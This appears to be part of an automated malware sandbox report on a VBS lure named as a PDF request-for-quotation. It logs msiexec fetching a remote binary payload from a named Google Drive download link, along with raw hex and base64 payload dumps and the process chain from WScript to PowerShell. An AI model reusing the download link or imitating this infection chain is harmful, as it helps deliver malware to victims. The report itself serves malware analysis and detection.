                                              2024-10-25 17:43:30 UTC1378INData Raw: 42 39 55 71 67 59 50 4a 48 6b 73 46 30 45 6e 70 77 50 41 71 33 6e 69 76 38 45 59 66 66 52 30 78 6d 2f 41 38 42 53 50 68 74 35 59 51 4a 6d 71 4d 37 57 4c 52 38 56 5a 42 57 68 4f 41 74 42 62 54 58 35 64 50 41 5a 31 33 45 45 6f 7a 76 6a 32 56 2f 78 6f 46 6d 44 42 77 4b 39 4a 78 72 39 30 68 61 55 4b 47 57 4b 72 45 39 75 58 61 32 51 6d 73 4d 6b 5a 58 73 37 39 33 71 39 48 47 6a 64 4c 57 68 39 52 2f 46 63 69 41 61 39 33 63 36 35 6f 65 68 65 52 56 63 6e 2f 67 50 43 30 4a 52 71 54 57 49 67 63 63 5a 77 6e 51 45 31 4e 31 68 50 77 71 66 57 32 46 35 6e 44 6f 37 35 53 50 49 45 6b 51 37 73 2f 73 4a 48 38 2b 58 77 4b 42 32 32 51 51 68 39 6b 38 75 31 38 67 61 39 43 75 72 74 54 5a 42 39 55 4b 71 58 6e 69 71 39 79 51 77 42 31 72 52 65 38 7a 67 39 6f 70 31 42 39 39 76 69 41
                                              Data Ascii: B9UqgYPJHksF0EnpwPAq3niv8EYffR0xm/A8BSPht5YQJmqM7WLR8VZBWhOAtBbTX5dPAZ13EEozvj2V/xoFmDBwK9Jxr90haUKGWKrE9uXa2QmsMkZXs793q9HGjdLWh9R/FciAa93c65oeheRVcn/gPC0JRqTWIgccZwnQE1N1hPwqfW2F5nDo75SPIEkQ7s/sJH8+XwKB22QQh9k8u18ga9CurtTZB9UKqXniq9yQwB1rRe8zg9op1B99viA
                                              2024-10-25 17:43:30 UTC1378INData Raw: 43 50 77 37 58 72 52 4f 63 47 6e 6d 4f 57 38 4c 39 65 65 46 35 45 35 4c 34 41 69 71 76 51 31 74 56 37 64 73 66 54 5a 45 38 6f 31 2b 76 51 32 4a 75 68 32 62 4e 71 53 36 67 73 36 59 75 73 4a 36 6d 4c 72 43 65 74 77 6f 72 65 77 52 65 41 34 41 6d 49 64 36 39 58 6d 71 50 30 30 56 4d 55 32 4c 6f 48 76 2f 32 45 4d 34 4d 58 6b 2f 76 4d 50 7a 53 75 6a 73 44 49 53 2b 77 6e 73 36 43 63 4b 65 66 72 34 53 36 42 31 50 42 70 79 63 43 6c 50 59 4c 73 71 51 66 6b 67 72 72 62 76 55 36 4f 52 4e 7a 4c 37 43 65 54 77 71 78 6e 71 59 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43
                                              Data Ascii: CPw7XrROcGnmOW8L9eeF5E5L4AiqvQ1tV7dsfTZE8o1+vQ2Juh2bNqS6gs6YusJ6mLrCetworewReA4AmId69XmqP00VMU2LoHv/2EM4MXk/vMPzSujsDIS+wns6CcKefr4S6B1PBpycClPYLsqQfkgrrbvU6ORNzL7CeTwqxnqYAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAAC
                                              2024-10-25 17:43:30 UTC1378INData Raw: 33 70 38 36 4e 59 5a 34 57 38 47 68 77 74 6d 4e 69 49 76 67 38 31 46 77 75 73 77 53 35 71 65 59 46 49 66 2f 36 55 46 48 4b 63 75 73 46 4c 36 41 42 77 74 4f 65 62 6d 65 77 49 57 71 59 59 79 77 32 73 6a 63 43 62 74 30 38 79 69 69 46 6c 4e 6a 42 4e 4c 61 61 79 48 78 37 57 6f 57 73 78 54 72 4e 69 78 61 51 48 2f 48 35 49 4b 75 70 63 70 56 54 47 71 67 76 35 62 58 32 57 76 6e 4c 70 54 30 39 42 70 39 5a 55 49 2f 49 79 2f 4d 57 31 59 33 6b 57 56 4a 39 32 74 47 6c 54 61 4d 58 55 72 4b 6c 78 6c 4a 2b 31 6f 43 68 6d 6a 4f 5a 31 48 55 57 74 4b 4b 56 64 70 35 49 70 59 6b 68 39 67 6a 75 71 5a 65 4d 77 4c 30 7a 66 37 2f 55 79 61 59 50 54 46 4c 31 76 55 46 30 32 74 63 2f 6f 76 71 7a 69 66 70 69 36 2f 6e 6e 31 35 73 4a 36 6d 4c 72 43 65 70 69 36 2f 52 35 49 6c 31 48 62 38
                                              Data Ascii: 3p86NYZ4W8GhwtmNiIvg81FwuswS5qeYFIf/6UFHKcusFL6ABwtOebmewIWqYYyw2sjcCbt08yiiFlNjBNLaayHx7WoWsxTrNixaQH/H5IKupcpVTGqgv5bX2WvnLpT09Bp9ZUI/Iy/MW1Y3kWVJ92tGlTaMXUrKlxlJ+1oChmjOZ1HUWtKKVdp5IpYkh9gjuqZeMwL0zf7/UyaYPTFL1vUF02tc/ovqzifpi6/nn15sJ6mLrCepi6/R5Il1Hb8
                                              2024-10-25 17:43:30 UTC1378INData Raw: 41 2b 44 41 46 48 31 42 38 56 52 7a 66 72 30 5a 6f 31 61 49 69 48 31 42 73 6f 49 37 34 70 37 36 63 4c 56 6e 57 65 44 6d 38 2b 6c 31 48 41 4d 32 57 4b 43 44 75 7a 79 32 6a 30 4a 79 6d 4c 6e 77 4a 5a 75 79 36 4c 4e 46 72 35 54 38 55 62 59 4a 32 6d 43 4f 30 6e 69 50 75 76 78 73 37 31 45 39 68 39 70 61 31 65 2f 72 75 6e 57 58 54 55 33 65 72 33 30 76 48 4a 5a 4f 75 57 4b 33 4d 4b 31 56 39 77 76 67 35 6e 6e 79 37 31 2b 30 4b 51 48 75 74 54 50 69 74 68 42 62 64 76 68 4f 52 4e 7a 75 45 76 4a 2b 54 4d 41 58 47 66 6e 54 70 50 33 56 51 2f 71 58 31 39 69 39 72 6b 46 4c 42 63 49 4b 48 65 56 2b 65 4a 4a 57 36 55 59 48 42 48 4c 79 74 78 6a 7a 49 36 52 54 38 53 50 74 50 37 36 6c 6c 2b 4d 2b 4b 6b 57 45 52 2f 4a 36 6d 4c 72 43 65 70 69 36 77 76 57 75 6b 6a 61 73 58 33 77
                                              Data Ascii: A+DAFH1B8VRzfr0Zo1aIiH1BsoI74p76cLVnWeDm8+l1HAM2WKCDuzy2j0JymLnwJZuy6LNFr5T8UbYJ2mCO0niPuvxs71E9h9pa1e/runWXTU3er30vHJZOuWK3MK1V9wvg5nny71+0KQHutTPithBbdvhORNzuEvJ+TMAXGfnTpP3VQ/qX19i9rkFLBcIKHeV+eJJW6UYHBHLytxjzI6RT8SPtP76ll+M+KkWER/J6mLrCepi6wvWukjasX3w
                                              2024-10-25 17:43:30 UTC1378INData Raw: 79 71 55 48 37 44 37 6f 48 62 52 49 62 53 65 4c 53 4b 55 4a 4d 45 6c 65 79 64 4f 45 4c 47 61 70 6e 34 49 6c 66 38 6e 63 36 76 51 46 68 66 41 6f 7a 50 4c 74 38 73 44 62 36 5a 78 4a 44 6d 57 75 66 46 39 56 47 77 66 38 6f 66 38 78 4b 7a 35 79 74 6b 33 6b 77 59 73 6b 33 75 45 75 68 4b 6a 73 58 66 55 4e 58 31 6a 69 49 73 4c 64 75 49 6b 2b 6c 68 41 6c 43 66 63 73 51 2b 75 45 7a 46 73 59 55 39 49 71 53 38 6b 7a 50 49 4a 66 31 71 41 63 39 74 32 79 59 7a 52 69 2f 62 61 76 4a 56 48 47 33 51 35 64 53 66 74 53 4a 36 6d 4c 6a 6b 54 45 53 2b 77 6e 76 65 58 44 2f 4a 45 56 44 46 76 47 72 35 55 30 79 66 48 54 39 78 57 77 54 46 76 34 50 70 6f 58 69 66 76 6f 6b 65 58 56 6a 6d 76 35 38 73 67 7a 38 54 7a 56 4b 51 6c 72 62 75 55 6e 4d 54 54 32 6b 69 34 73 53 34 7a 39 6b 47 45
                                              Data Ascii: yqUH7D7oHbRIbSeLSKUJMEleydOELGapn4Ilf8nc6vQFhfAozPLt8sDb6ZxJDmWufF9VGwf8of8xKz5ytk3kwYsk3uEuhKjsXfUNX1jiIsLduIk+lhAlCfcsQ+uEzFsYU9IqS8kzPIJf1qAc9t2yYzRi/bavJVHG3Q5dSftSJ6mLjkTES+wnveXD/JEVDFvGr5U0yfHT9xWwTFv4PpoXifvokeXVjmv58sgz8TzVKQlrbuUnMTT2ki4sS4z9kGE


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449739142.250.185.2384434092C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 17:44:05 UTC216OUTGET /uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2024-10-25 17:44:05 UTC1610INHTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 25 Oct 2024 17:44:05 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Content-Security-Policy: script-src 'nonce-Vg0guAu_EtGzO0xG95QJ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Cross-Origin-Opener-Policy: same-origin
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449740172.217.16.1934434092C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 17:44:06 UTC258OUTGET /download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Cache-Control: no-cache
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
                                              2024-10-25 17:44:08 UTC4932INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="pLQbThrxYaBLSDAeejYcvLi110.bin"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 275008
                                              Last-Modified: Thu, 24 Oct 2024 09:03:12 GMT
                                              X-GUploader-UploadID: AHmUCY1X6OwPQ2A44Ahx_oFRtLIAFdk1HcGwrtZUWka2grAnjE-C4OwjyF8y1QirR9pGl1ETYEFVU47BVQ
                                              Date: Fri, 25 Oct 2024 17:44:08 GMT
                                              Expires: Fri, 25 Oct 2024 17:44:08 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=7u+o5w==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-10-25 17:44:08 UTC4932INData Raw: 1f d2 00 19 0f c0 df 11 86 99 e3 08 38 c0 ca e1 56 b0 9f 32 07 1f a7 ec a9 09 0d 47 8e a2 1d f2 e9 ce 1e 51 5f 9c 68 7c 00 eb 46 d3 59 87 62 c3 88 50 87 0d 47 0e 7d 20 93 ab 46 1f f5 76 b8 26 22 66 00 64 0c 45 c8 cb 7c 09 24 81 2a 84 b5 ab b0 91 87 b2 32 2b 9b 82 02 3c 78 f2 9b 14 bf e0 be e7 bc 6c f4 aa df 38 88 d9 29 fc a6 f6 3e dd 15 0f 17 c4 91 5b a2 ef bd 6c b6 ec ba 68 2b d0 14 c1 a3 d1 e8 81 98 84 55 8e 2e 6c dd e9 a2 54 42 69 52 da c4 fb 20 8d 20 8f 6a 2b 9c 65 f6 12 ab 5d a5 9c d6 9e 95 ae 57 f6 b2 71 82 4a 26 b9 a2 54 14 3b 22 1e ac 53 fd 22 4a 79 82 30 2f b9 86 1c 82 73 16 cc ad bc 11 73 43 da e8 7c 25 6b de 2a fc f6 b8 b4 d8 e8 77 1f c5 08 77 41 bc ef 14 a4 b7 c9 00 b9 a2 2d 4c 7c 2b 1a e3 bc f6 78 b4 cb 14 7f fc d5 dd ae 1e c7 37 47 38 c7 8e
                                              Data Ascii: 8V2GQ_h|FYbPG} Fv&"fdE|$*2+<xl8)>[lh+U.lTBiR j+e]WqJ&T;"S"Jy0/ssC|%k*wwA-L|+x7G8
                                              2024-10-25 17:44:08 UTC4832INData Raw: f7 13 e0 bf d7 31 01 ba 09 42 6e 58 13 e1 b8 4e c5 5f d4 bf 0d 7e af 60 e4 94 02 57 fb b9 26 5d 11 c4 a0 e5 7b 5a ae a5 a4 f7 71 c3 6c 3f ca 0a e3 d4 aa 90 b3 c8 d2 41 3e ed 71 44 0a b1 d5 b9 d9 38 39 6d 2b f2 2e a6 b1 35 cb 18 c2 40 2b 49 f0 d3 5f c5 77 fe 89 6a da 61 21 cf ef 33 03 f1 60 1e 40 eb a2 86 d3 ee a7 af b4 a5 83 35 8b c6 87 b9 8a 01 f3 d7 5f 1c bf f8 34 4f f5 c1 85 7c 81 c2 43 98 2a 38 54 ee 8a 04 2c 2a 7f 1f ab ec 9f f6 78 a2 ca a5 4c 59 1f d0 34 10 29 d2 08 0c 93 5c e2 e9 4f b1 47 f9 57 3c b4 81 74 6e bc 86 7f 78 b1 8c 4d b0 ea 9d f8 34 5e 3e 03 b3 b7 c1 8a 17 42 be 99 7d ef 2d 3e 63 64 75 40 10 1f 56 e4 a0 bd 88 e8 82 3a c8 97 a3 ec fb 44 b5 b5 21 5f 70 5f da 25 4e e6 c4 21 c2 a9 df a3 7a 1f e8 05 a8 a2 f8 5f c1 94 54 00 a3 0c ba 3a 38 b1
                                              Data Ascii: 1BnXN_~`W&]{Zql?A>qD89m+.5@+I_wja!3`@5_4O|C*8T,*xLY4)\OGW<tnxM4^>B}->cdu@V:D!_p_%N!z_T:8
                                              2024-10-25 17:44:08 UTC1325INData Raw: 37 57 15 fc b9 8a 02 fc d7 fb 89 40 af c6 e1 a6 c4 75 b4 d8 6d 24 ea 15 7a a5 48 ad 4d 43 a6 42 11 87 0e d0 a0 22 21 c7 3f 70 71 ce cb 96 a9 80 0b 10 ea ac 0e 55 b2 c2 30 96 d5 0c 54 bc 33 53 8f cb d0 6e f7 b6 e3 40 19 d2 9b ef aa ce cf 7f f9 4e 4d 1b 88 e8 7a 2c d3 37 da 44 75 d8 24 e8 eb fd c4 6c 75 85 4b 13 6b 9b 8d 5b dc ec 4b f7 4c 95 c1 b2 47 82 36 71 c2 66 1f b9 90 c5 79 94 dc f4 da 44 1c 68 14 e9 92 d2 65 bc f2 a3 5c 55 cb 41 5c 84 f4 11 c9 f0 ce 90 4d e0 8c 26 03 a5 44 f8 09 7d 44 9a d4 a9 42 86 ad cf 54 24 11 d0 d5 c0 63 fe c0 d1 4e e5 36 3a 2d eb 27 36 a6 c7 8f 60 86 e0 a8 b3 49 92 c8 54 38 09 32 da 07 ed 36 a9 7f e2 91 2d 33 8c bd 2f 91 2e c3 48 08 45 ba 0e 6a 61 a1 93 ba 46 2b 4c 5a de 2b 34 1e 32 9b 21 60 40 d1 9d e7 92 a9 49 fb 19 1e ec 88
                                              Data Ascii: 7W@um$zHMCB"!?pqU0T3Sn@NMz,7Du$luKk[KLG6qfyDhe\UA\M&D}DBT$cN6:-'6`IT826-3/.HEjaF+LZ+42!`@I
                                              2024-10-25 17:44:08 UTC1378INData Raw: d0 1a d4 04 52 a8 35 91 48 51 20 5d 1c 1f c8 86 9e 0e 0d 5a 1e b6 94 4d 5d 64 fa 38 1e f2 0b e8 df fa 64 b9 c1 f6 ec e4 62 52 85 ae 2b c9 05 05 3b ea 20 0e 74 0c 13 a5 fb fc 3e 38 f1 8d 30 5f 1b fe 2c 82 73 50 a2 f2 bc c8 fc c0 9d f3 f1 65 6b de 2b d9 e0 2a 08 c8 e9 0c bc b0 1f 5f e9 b8 ef 1e 12 92 d1 72 ef ad 2d f2 e5 0a 03 9d a4 f6 78 b0 29 35 65 8e ee 9e ae 6e 45 1f 32 38 c5 84 9d ff d8 78 84 90 9e de cf 2c a1 ad ce 03 df 40 0f c6 6d d9 79 34 ad 80 78 47 d0 c2 c5 bd fc 09 03 b5 06 f1 3e a0 4b f6 23 41 38 9c da 9c dc 27 fd 5c 83 7f 34 bf 58 53 7c 8b 29 91 84 66 39 31 15 32 8f 8f 37 60 24 85 be 77 4f 8c 7d 55 84 e5 15 7c 52 5e 52 3f e4 28 ce 71 12 24 3b cc b5 68 87 7f 57 62 77 ab 58 21 85 04 8a 99 47 c6 33 3f 09 eb 4f 4f cc 94 33 9f 13 04 43 b5 7b b1 f5
                                              Data Ascii: R5HQ ]ZM]d8dbR+; t>80_,sPek+*_r-x)5enE28x,@my4xG>K#A8'\4XS|)f9127`$wO}U|R^R?(q$;hWbwX!G3?OO3C{
                                              2024-10-25 17:44:08 UTC1378INData Raw: f6 27 fd c6 b3 52 94 a6 d5 d3 04 e4 ff 7b 81 a6 d4 53 72 b5 21 73 65 1c b0 4a 46 90 b2 5c be 97 61 44 95 5b 52 25 86 ed d4 8d 20 f0 78 7e 34 8d 16 df 8b 53 3d f6 54 45 fa 58 69 ea 04 20 11 b1 06 b5 ef 45 34 a8 35 16 9c 36 70 76 5f 3f 9e ae 3f 91 cc ad 32 83 3c 8e ec 41 b7 20 be d2 6a 8d 12 ec 26 69 00 b6 13 9a 9f 9d 14 e9 70 8d 37 bf aa 42 9d 09 d6 0d f3 19 ba 0b 35 cc 08 0c 6d 9f f3 2b 18 ba bf 97 ec 9b f4 ea 0d d7 83 6c d4 69 1d d5 04 f8 04 3a be c6 72 92 a8 d7 a6 02 4b 73 57 89 1e 26 08 b4 b0 f4 20 4f 2a b3 f8 2b 8c 68 9f a3 35 d9 cc ec 02 21 b9 32 fe 25 cd 67 14 eb 4d 07 3b 57 4d ee 3c 35 ae b3 db 8f fc 9e 9a 00 8e 65 b8 f2 aa ae 83 3f 10 f0 bc 15 25 8d fe bf f0 19 cd ed c6 fd 01 9e c5 15 3d 52 d7 df c4 16 29 15 54 5c e0 c5 7b 05 51 01 a3 c2 8a 9d 82
                                              Data Ascii: 'R{Sr!seJF\aD[R% x~4S=TEXi E456pv_??2<A j&ip7B5m+li:rKsW& O*+h5!2%gM;WM<5e?%=R)T\{Q
                                              2024-10-25 17:44:08 UTC1378INData Raw: dc 2d 10 ce e1 09 d8 88 ad 27 77 3e a4 1d f9 46 08 41 91 1c 0b ca 92 71 3f 85 34 0c 3c 90 09 c8 f0 6b a0 3f 72 db 32 6f 71 ec 2a f6 fe ae c7 fe 25 6b 8c 9e f1 95 71 6b 5e 48 ea 0a e3 f6 80 6f 98 50 d0 15 3a 77 bd 57 5d fa 9a 1c 31 1a 5c 20 22 e3 ef 1d 22 6f f7 32 2a be f9 dc 39 87 3b ad 00 cb aa 7a 18 18 36 5c 5f 05 11 1c 16 da 3b 46 65 80 01 4e fa 8e 7d 41 98 04 8f 7d 00 d8 b1 cd 60 c1 84 57 39 08 e8 e5 07 b6 9c 90 23 25 33 bb e0 23 a5 1d 56 39 6b 50 10 ef 1e 7c 33 df 80 95 7c 93 f9 93 e7 7a c4 32 41 c1 2f 27 5f 75 e9 3f 94 ef 3f 43 ec 55 9c cf b2 25 0c 43 0c 85 23 96 70 b1 d8 50 0c 2d 1e 7e 65 aa 49 56 22 23 42 d2 7a 7d b5 3f 7b ea 08 c3 62 8b 3c 00 92 50 55 1e 95 97 63 3b df b0 ab 4d 76 2a 04 a2 b8 3e 65 7a cd c1 6f 7e af 64 71 b0 18 25 10 b7 26 2d bd
                                              Data Ascii: -'w>FAq?4<k?r2oq*%kqk^HoP:wW]1\ ""o2*9;z6\_;FeN}A}`W9#%3#V9kP|3|z2A/'_u??CU%C#pP-~eIV"#Bz}?{b<PUc;Mv*>ezo~dq%&-
                                              2024-10-25 17:44:08 UTC1378INData Raw: 97 b2 18 36 74 d5 88 c7 a0 40 77 c1 cf f0 c7 f3 d2 b7 70 e1 a1 2a 24 78 2e d2 a8 90 7b 46 d2 fb ab 31 b3 d7 f7 14 e1 73 b4 d2 7e 39 fb 77 27 0e 48 a9 35 14 b5 58 0e 3b 26 51 aa 22 3a ca ae aa 62 c8 d0 90 90 7b ca 10 ea d2 21 55 a4 ee 34 a7 d7 06 24 8a 1b de 8f cb f2 0f 09 b7 fa 47 14 58 e2 df ab cf ea 69 9f 25 40 26 f8 c0 3d 5f 13 31 78 6b 4a 67 61 e8 e1 f9 15 8b 6d f7 f5 11 63 fa ad 65 e6 ec 4d 51 1a 4f bf f4 4d ed f6 d3 e7 76 6d 48 89 aa cc 36 f9 e5 bf f4 5c 68 10 87 71 c4 17 d4 e2 b2 24 85 8c 46 74 40 dc a5 c3 52 e1 fa 47 aa 99 56 5b 5c 61 e1 2b a6 83 9a de 01 67 8d d7 ee cb 64 61 72 fc 90 75 8c f6 7c 66 e0 94 1f 30 d0 8d 44 04 d8 2d 35 e0 8d fe bc 4d ca 23 71 21 7d 78 4a 15 e9 e4 a4 27 90 eb 24 22 e2 0e 1e a2 14 e9 48 0e 41 c5 aa 77 13 29 b9 92 02 89
                                              Data Ascii: 6t@wp*$x.{F1s~9w'H5X;&Q":b{!U4$GXi%@&=_1xkJgamceMQOMvmH6\hq$Ft@RGV[\a+gdaru|f0D-5M#q!}xJ'$"HAw)
                                              2024-10-25 17:44:08 UTC1378INData Raw: 8e 7d af df ef 8c f6 ec ea af 2b 9f dc 5b ca 02 7d 17 a6 51 1f e0 0c 13 ab 59 d9 25 25 c6 82 30 25 b4 df 51 94 7b d4 a4 c1 e2 c8 f6 d9 bc e1 13 8f 6b de 20 fc 28 54 b4 d3 c5 7b 17 fa 09 77 5d b2 ef c8 6e a4 ec 28 8d a2 2d 88 54 2b 1a cb fe f6 78 be 56 73 79 fc d5 9d ae 1e 99 05 47 38 c1 fc d9 df ce 20 e4 b8 1f d4 cf 06 b7 5f cf 10 f2 26 0a ff ad db 79 4a ec af 78 43 c5 91 86 55 ee 79 65 e3 98 f1 3e ae 75 41 22 52 34 9c fe db ac 26 fd 58 ab 55 ca b9 63 53 a2 9d 7f 79 b0 66 33 13 c7 11 8f ad 55 13 e6 8f 60 7d 5c 8b 6c 2c cd df 15 78 24 7a 93 3f 94 34 89 34 12 24 3b da 5a 6e fb 9e 46 46 51 89 78 ac c5 00 e5 5e 62 d0 4b 03 17 ec 4d 8f f9 83 6b 03 a7 04 49 1d 2c d1 97 93 12 57 90 ce 5e 06 65 b5 6d 43 24 75 84 83 b4 4d f0 53 75 a1 ae 97 2e 15 25 4c 73 37 2e 11
                                              Data Ascii: }+[}QY%%0%Q{k (T{w]n(-T+xVsyG8 _&yJxCUye>uA"R4&XUcSyf3U`}\l,x$z?44$;ZnFFQx^bKMkI,W^emC$uMSu.%Ls7.
                                              2024-10-25 17:44:08 UTC1378INData Raw: 9d 7e 9a bd da 58 25 f2 d0 2a 8c 37 a2 84 5f 0d 49 05 d8 9a 7d 08 27 54 4f ed c4 2e 85 d7 21 34 ad 74 cf c5 45 44 0e 63 c8 b4 82 7a 65 5d e3 8a b6 4d c3 b1 fa 40 21 69 81 ba f8 b7 20 b0 66 b1 96 73 de 34 60 5c 18 27 89 f6 d2 de e9 74 25 12 a3 f3 59 8b 18 ae b9 b4 a6 ba 0b 35 a3 54 1d 65 eb de 09 03 33 d7 5c ec 9a db 93 b3 f5 94 66 a4 da 30 bc 16 4c 04 3e ca 5f 57 8a de f2 15 02 3b db 1d 5d 60 1e 02 b4 a5 5e 14 53 37 46 fb 2b f6 ca a6 d0 5a 16 c6 ff 2b 37 b9 20 fe 25 c1 67 ea fb 64 2f 0f 7f 3a e4 2f 35 ae 9b c7 b0 fc 94 40 11 ac 17 fa 9b 9f de fd 24 62 a7 ba 3d 1c 9b d6 34 e1 3a b9 bb 38 fc 16 bd ea 1e 04 9f d6 01 d4 4d 2a 21 54 58 c2 3d 5f 05 73 70 af bc b6 43 82 95 fa 12 56 5d ce 6e 2f f4 da 99 f4 94 fa b1 43 d3 9d 31 40 65 f7 8a 93 ca 0c d9 09 b6 92 76
                                              Data Ascii: ~X%*7_I}'TO.!4tEDcze]M@!i fs4`\'t%Y5Te3\f0L>_W;]`^S7F+Z+7 %gd/:/5@$b=4:8M*!TX=_spCV]n/C1@ev
                                              2024-10-25 17:44:08 UTC1378INData Raw: 1a f4 04 44 50 a1 d1 40 3f 70 fd 56 8f 07 2f c7 f4 3e 6d 00 59 ed 93 38 b7 46 48 ea 70 f8 bf 80 6b e0 75 36 05 4a 11 e6 04 5d fa 9a 65 1c 1b 57 2d 1b b9 d2 1d 22 7f 54 ae 2a be f2 e7 05 f9 0a a7 72 d5 c8 2d 6a 0f cb 49 77 84 10 39 0a b2 81 47 76 96 38 58 d6 82 6a 3f 36 6b 45 77 72 22 a5 cd 3b e2 df 46 28 14 f9 64 07 b6 92 b8 69 34 22 cf a0 3c a5 19 7a da 21 50 1a 8a 70 68 27 c1 a8 3e 6d ed c9 e7 64 7e ba 08 4d c1 23 26 bb 65 e9 45 94 99 3f 43 ec 55 85 a0 e1 29 63 89 72 c6 29 96 65 ce 0b 9f 0c 27 7b c3 bb ba 66 7e 3e 79 42 d8 63 73 38 57 19 ea 09 ec aa f9 d8 14 92 20 f7 45 b7 bf d7 3f ad ed 0b 68 1e 4e 7a 2c b8 4e cd 49 2a be 44 6a be 74 ea 6e 03 57 6a a5 ab 1d 1f c4 a1 c0 6d 28 aa b3 a6 87 d3 e6 d6 16 7e 0a f8 de 08 b5 63 bb 84 4e 30 9d d3 61 13 cf ed b9
                                              Data Ascii: DP@?pV/>mY8FHpku6J]eW-"T*r-jIw9Gv8Xj?6kEwr";F(di4"<z!Pph'>md~M#&eE?CU)cr)e'{f~>yBcs8W E?hNz,NI*DjtnWjm(~cN0a


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:13:43:14
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
                                              Imagebase:0x7ff6a5210000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:13:43:17
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
